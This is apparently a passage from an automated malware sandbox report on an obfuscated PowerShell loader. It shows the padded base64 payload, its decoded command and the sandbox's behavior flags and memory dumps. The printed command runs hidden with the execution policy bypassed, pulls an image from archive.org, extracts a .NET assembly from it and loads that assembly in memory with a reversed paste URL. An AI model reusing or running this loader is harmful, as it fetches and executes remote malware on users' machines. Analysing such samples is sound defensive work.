⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽D0♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽ZQBU♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽E8♺ ⠰ ℁ ⇝ ⾽Zg♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bp♺ ⠰ ℁ ⇝ ⾽GY♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽M♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽C0♺ ⠰ ℁ ⇝ ⾽ZwB0♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽B7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Kw♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YQBy♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽RgBs♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Ew♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽YQBz♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽Ew♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽ZQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽SQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽LQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bi♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽DY♺ ⠰ ℁ ⇝ ⾽N♺ ⠰ ℁ ⇝ ⾽BD♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽aQBt♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽ZwBl♺ ⠰ ℁ ⇝ ⾽FQ♺ ⠰ ℁ ⇝ ⾽ZQB4♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽LgBT♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽YgBz♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cgBp♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Zw♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bi♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽DY♺ ⠰ ℁ ⇝ ⾽N♺ ⠰ ℁ ⇝ ⾽BM♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bgBn♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ds♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GM♺ ⠰ ℁ ⇝ ⾽bwBt♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽QgB5♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽ZQBz♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽UwB5♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽LgBD♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽bgB2♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cgB0♺ ⠰ ℁ ⇝ ⾽F0♺ ⠰ ℁ ⇝ ⾽Og♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽EY♺ ⠰ ℁ ⇝ ⾽cgBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽QgBh♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽2♺ ⠰ ℁ ⇝ ⾽DQ♺ ⠰ ℁ ⇝ ⾽UwB0♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽aQBu♺ ⠰ ℁ ⇝ ⾽Gc♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽k♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽YQBz♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Ng♺ ⠰ ℁ ⇝ ⾽0♺ ⠰ ℁ ⇝ ⾽EM♺ ⠰ ℁ ⇝ ⾽bwBt♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YQBu♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YQBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BB♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YgBs♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽WwBT♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽cwB0♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽bQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽FI♺ ⠰ ℁ ⇝ ⾽ZQBm♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽ZQBj♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQBv♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽LgBB♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽cwBl♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽YgBs♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽XQ♺ ⠰ ℁ ⇝ ⾽6♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽T♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽YwBv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽bQBh♺ ⠰ ℁ ⇝ ⾽G4♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽BC♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽7♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽PQ♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽QQBz♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽ZQBt♺ ⠰ ℁ ⇝ ⾽GI♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽B5♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽V♺ ⠰ ℁ ⇝ ⾽B5♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽o♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bu♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽aQBi♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽SQBP♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽S♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽G0♺ ⠰ ℁ ⇝ ⾽ZQ♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽Ow♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽CQ♺ ⠰ ℁ ⇝ ⾽bQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽9♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽Hk♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽RwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽TQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽a♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽FY♺ ⠰ ℁ ⇝ ⾽QQBJ♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽KQ♺ ⠰ ℁ ⇝ ⾽u♺ ⠰ ℁ ⇝ ⾽Ek♺ ⠰ ℁ ⇝ ⾽bgB2♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽awBl♺ ⠰ ℁ ⇝ ⾽Cg♺ ⠰ ℁ ⇝ ⾽J♺ ⠰ ℁ ⇝ ⾽Bu♺ ⠰ ℁ ⇝ ⾽HU♺ ⠰ ℁ ⇝ ⾽b♺ ⠰ ℁ ⇝ ⾽Bs♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽Bb♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YgBq♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽YwB0♺ ⠰ ℁ ⇝ ⾽Fs♺ ⠰ ℁ ⇝ ⾽XQBd♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽K♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽e♺ ⠰ ℁ ⇝ ⾽B0♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽MQBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Lw♺ ⠰ ℁ ⇝ ⾽z♺ ⠰ ℁ ⇝ ⾽Gw♺ ⠰ ℁ ⇝ ⾽awBs♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽YgBq♺ ⠰ ℁ ⇝ ⾽DM♺ ⠰ ℁ ⇝ ⾽LwB3♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽cg♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽HY♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽C4♺ ⠰ ℁ ⇝ ⾽ZQBk♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽YwBl♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽H♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Lw♺ ⠰ ℁ ⇝ ⾽v♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽cwBw♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽d♺ ⠰ ℁ ⇝ ⾽Bo♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽x♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽I♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽JwBD♺ ⠰ ℁ ⇝ ⾽Do♺ ⠰ ℁ ⇝ ⾽X♺ ⠰ ℁ ⇝ ⾽BQ♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽bwBn♺ ⠰ ℁ ⇝ ⾽HI♺ ⠰ ℁ ⇝ ⾽YQBt♺ ⠰ ℁ ⇝ ⾽EQ♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽X♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽C♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽g♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽c♺ ⠰ ℁ ⇝ ⾽By♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽egBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽G8♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽s♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bl♺ ⠰ ℁ ⇝ ⾽HM♺ ⠰ ℁ ⇝ ⾽YQB0♺ ⠰ ℁ ⇝ ⾽Gk♺ ⠰ ℁ ⇝ ⾽dgBh♺ ⠰ ℁ ⇝ ⾽GQ♺ ⠰ ℁ ⇝ ⾽bw♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cw♺ ⠰ ℁ ⇝ ⾽JwBk♺ ⠰ ℁ ⇝ ⾽GU♺ ⠰ ℁ ⇝ ⾽cwBh♺ ⠰ ℁ ⇝ ⾽HQ♺ ⠰ ℁ ⇝ ⾽aQB2♺ ⠰ ℁ ⇝ ⾽GE♺ ⠰ ℁ ⇝ ⾽Z♺ ⠰ ℁ ⇝ ⾽Bv♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽Cc♺ ⠰ ℁ ⇝ ⾽L♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽n♺ ⠰ ℁ ⇝ ⾽DM♺ ⠰ ℁ ⇝ ⾽Jw♺ ⠰ ℁ ⇝ ⾽p♺ ⠰ ℁ ⇝ ⾽Ck♺ ⠰ ℁ ⇝ ⾽fQB9♺ ⠰ ℁ ⇝ ⾽♺ ⠰ ℁ ⇝ ⾽==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('♺ ⠰ ℁ ⇝ ⾽','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://archive.org/download/nativee/nativee.jpg', 'https://archive.org/download/nativee/nativee.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.1etsap/3lkltbj3/war/ved.edocetsap//:sptth' , '1' , 'C:\ProgramData\' , 'desprezativo','desativado','desativado','','3'))}}"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2512

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    5a7bc6830d316e05571c769a7d345c3e

    SHA1

    eac4444a04a1942d97d9ea7635e89296b9bd41f0

    SHA256

    de8fb64eb788cdb5e91930f682ef35396b2ee27379ad9baf98345b5f41b2cd4c

    SHA512

    bf5ccefaab222a17554dbd15dd45f6cfc35e65cc4527903160d03a803b0a7b8cbaa64c669aa3fd3d854afe377b735a86e69a9ae277f9ecca28bd2a3f5bd2e04d

  • memory/2700-4-0x000007FEF59EE000-0x000007FEF59EF000-memory.dmp

    Filesize

    4KB

  • memory/2700-5-0x000000001B450000-0x000000001B732000-memory.dmp

    Filesize

    2.9MB

  • memory/2700-6-0x0000000002800000-0x0000000002808000-memory.dmp

    Filesize

    32KB

  • memory/2700-12-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-13-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2700-14-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

    Filesize

    9.6MB